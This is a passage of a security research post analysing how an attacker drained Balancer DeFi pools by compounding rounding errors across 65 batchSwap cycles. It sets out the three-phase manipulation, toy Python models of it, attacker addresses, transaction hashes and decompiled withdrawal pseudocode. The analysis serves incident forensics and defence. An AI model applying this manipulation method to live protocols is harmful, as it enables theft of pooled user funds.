This precision error propagates to the invariant D calculation, causing abnormal reduction in the calculated value. Since BPT price equals D divided by total supply, the reduced D directly lowers BPT price, creating arbitrage opportunities for the attacker.

Individual swaps produce negligible precision loss, but within a single batchSwap transaction containing 65 operations, these losses compound dramatically. The lack of invariant change validation allowed the attacker to systematically suppress BPT price through accumulated precision errors, extracting millions in value per pool.
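A toy model illustrates how per-operation losses compound within one atomic batch. The per-operation epsilon here is illustrative, not a value measured from the exploit:

```python
# Toy compounding model: if each micro-swap underestimates the invariant D
# by a small relative epsilon, 65 operations in one batchSwap multiply up.
eps = 0.001  # assumed per-operation relative loss, for illustration only
D = 1.0
for _ in range(65):
    D *= 1 - eps  # each operation recomputes D from rounded-down balances
print(f"D after 65 operations: {D:.4f} ({1 - D:.1%} suppression)")
```

Because BPT price is D divided by total supply, even a fractional-percent suppression of D per cycle becomes a material price distortion once the cycles run back-to-back in a single transaction.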

Attack Analysis

The Three-Phase Pattern

The attacker executed a sophisticated three-phase swap sequence within single `batchSwap` transactions:

Stage 1: Adjustment to Rounding Boundary

Swap large amounts of BPT for underlying tokens to push one token’s balance to the critical 8-9 wei threshold where rounding errors are maximized.

Stage 2: Trigger Precision Loss

Execute small swaps involving the boundary-positioned token. The _upscaleArray function rounds down during scaling, causing the invariant D to be underestimated and BPT price to drop artificially.

Stage 3: Extract Value

Mint or purchase BPT at the suppressed price, then immediately redeem for underlying assets at full value. The price discrepancy represents pure profit.

This three-phase cycle repeated 65 times within the same batchSwap transaction. All stages occur atomically, preventing intervention and ensuring precision losses accumulate across the shared balance state, ultimately extracting millions from each targeted pool.
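The three phases above can be sketched as a toy calculation. The pool numbers and the simplified "invariant" are assumptions for illustration, not reconstructed Balancer state:

```python
ONE = 10**18
FACTOR = 109 * ONE // 100  # hypothetical rate-based scaling factor (~1.09)

def floor_scale(balance_wei: int) -> int:
    # Models FixedPoint.mulDown: floor division drops the fractional part
    return balance_wei * FACTOR // ONE

# Toy pool: "D" is the scaled target balance plus the other, already-exact
# scaled balances; BPT price is D / supply. Real pools use the StableSwap
# invariant, and these numbers are purely illustrative.
OTHER_SCALED, SUPPLY = 991, 1000

def bpt_price(token_wei: int, exact: bool) -> float:
    d = token_wei * FACTOR / ONE if exact else floor_scale(token_wei)
    return (d + OTHER_SCALED) / SUPPLY

# Stage 1: the target balance has been pushed to the 9-wei boundary.
# Stage 2: floor scaling underestimates D, suppressing the BPT price.
suppressed = bpt_price(9, exact=False)
fair = bpt_price(9, exact=True)
# Stage 3: buy BPT at the suppressed price, redeem at fair value.
profit_per_bpt = fair - suppressed
print(suppressed, fair, profit_per_bpt)
```

Each cycle's gain looks small, but because all 65 cycles execute atomically against shared balance state, the gains accumulate without any opportunity for the pool or observers to intervene.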

Having understood the vulnerability mechanism, let’s examine how the attacker automated this exploitation.

Exploit Contract Architecture

The attacker deployed contract `0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d` with a three-address operational structure:

– Exploiter 1: 0x506D1f9EFe24f0d47853aDca907EB8d89AE03207 (deployer)

– Exploit Contract: 0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d

– Exploiter 2: 0xAa760D53541d8390074c61DEFeaba314675b8e3f (recipient)

Constructor-Based Attack

Analysis of transaction 0x6ed07db… revealed the theft occurred during contract deployment. The constructor automatically executed the rounding error exploitation, targeting two Balancer pools simultaneously.

The constructor generated 65 token transfers to Balancer’s Protocol Fees Collector—these are swap fees collected during the manipulation, not the stolen funds themselves. The transfer amounts display the characteristic pattern of iterative precision exploitation, decreasing from 0.414 osETH down to 0.000000000000000003 osETH as the rounding errors compound to negligible values.

The stolen value appears in InternalBalanceChanged events, which record balance updates within the Vault’s internal accounting system. The exploit contract’s internal balance increased by:

Pool 1 (osETH/wETH-BPT): +4,623 WETH, +6,851 osETH
Pool 2 (wstETH-WETH-BPT): +1,963 WETH, +4,259 wstETH
Combined total: 6,586 WETH (4,623 + 1,963) + 6,851 osETH + 4,259 wstETH

These internal balance increases represent the actual stolen funds. The InternalBalanceChanged events show that the exploit contract’s Vault-internal account was credited with the drained assets. While the underlying tokens physically remained in the Vault contract, the Vault’s accounting system now recognized the exploit contract as the owner of these balances, enabling later withdrawal.

Withdrawal Function

After the constructor accumulated stolen funds, function 0x8a4f75d6 transferred them to Exploiter 2:

// Decompiled pseudocode; variable names reconstructed, types omitted
function 0x8a4f75d6(address[] calldata targetPools) public {
    require(msg.sender == _callTx); // only the deployer-set caller may withdraw
    
    poolIndex = 0;
    while (poolIndex < targetPools.length) {
        poolId = targetPools[poolIndex].getPoolId();
        (tokens[],) = vault.getPoolTokens(poolId);
        internalBals[] = vault.getInternalBalance(address(this), tokens);
        
        tokenIndex = 0;
        while (tokenIndex < tokens.length) {
            operations[tokenIndex] = UserBalanceOp({
                kind: 1, // UserBalanceOpKind.WITHDRAW_INTERNAL
                asset: tokens[tokenIndex],
                amount: internalBals[tokenIndex],
                sender: address(this),
                recipient: 0xAa760D53541d8390074c61DEFeaba314675b8e3f
            });
            tokenIndex++;
        }
        
        vault.manageUserBalance(operations);
        poolIndex++;
    }
}

This function withdraws the contract’s own internal balance. The UserBalanceOp has sender equal to the exploit contract address because the contract legitimately owns the funds accumulated during constructor execution.

Transaction `0xd155207…` confirms this withdrawal transferred 6,586 WETH from the exploit contract’s internal balance to Exploiter 2 address.

The Two-Stage Attack

Stage 1 – Theft (Constructor Execution):

TX: 0x6ed07db1a9fe5c0794d44cd36081d6a6df103fab868cdd75d581e3bd23bc9742

Action: Deploy exploit contract

Method: Constructor executes batchSwap operations against two pools

Result: $63M drained via rounding error, stored in contract’s internal balance

Evidence: 65 fee transfers + InternalBalanceChanged events showing +6,586 WETH, +6,851 osETH, +4,259 wstETH

Stage 2 – Extraction (Function Call):

TX: 0xd155207261712c35fa3d472ed1e51bfcd816e616dd4f517fa5959836f5b48569

Action: Call function 0x8a4f75d6

Method: Withdraw internal balance to Exploiter 2

Result: Funds transferred to final recipient

Evidence: manageUserBalance with sender = exploit contract

Conclusion

The Balancer exploit demonstrates how mathematical vulnerabilities in DeFi protocols can be weaponized through automation and careful parameter tuning. The attacker’s success stemmed from recognizing that negligible rounding errors become exploitable when amplified through dozens of operations in atomic transactions.

Despite extensive audits, the vulnerability persisted because traditional testing focuses on individual operation correctness, not cumulative effects of adversarial batch operations. The industry must evolve toward continuous security validation, economic attack modeling, and adversarial testing that considers how tiny flaws compound into catastrophic exploits.

The post How an Attacker Drained $128M from Balancer Through Rounding Error Exploitation appeared first on Check Point Research.
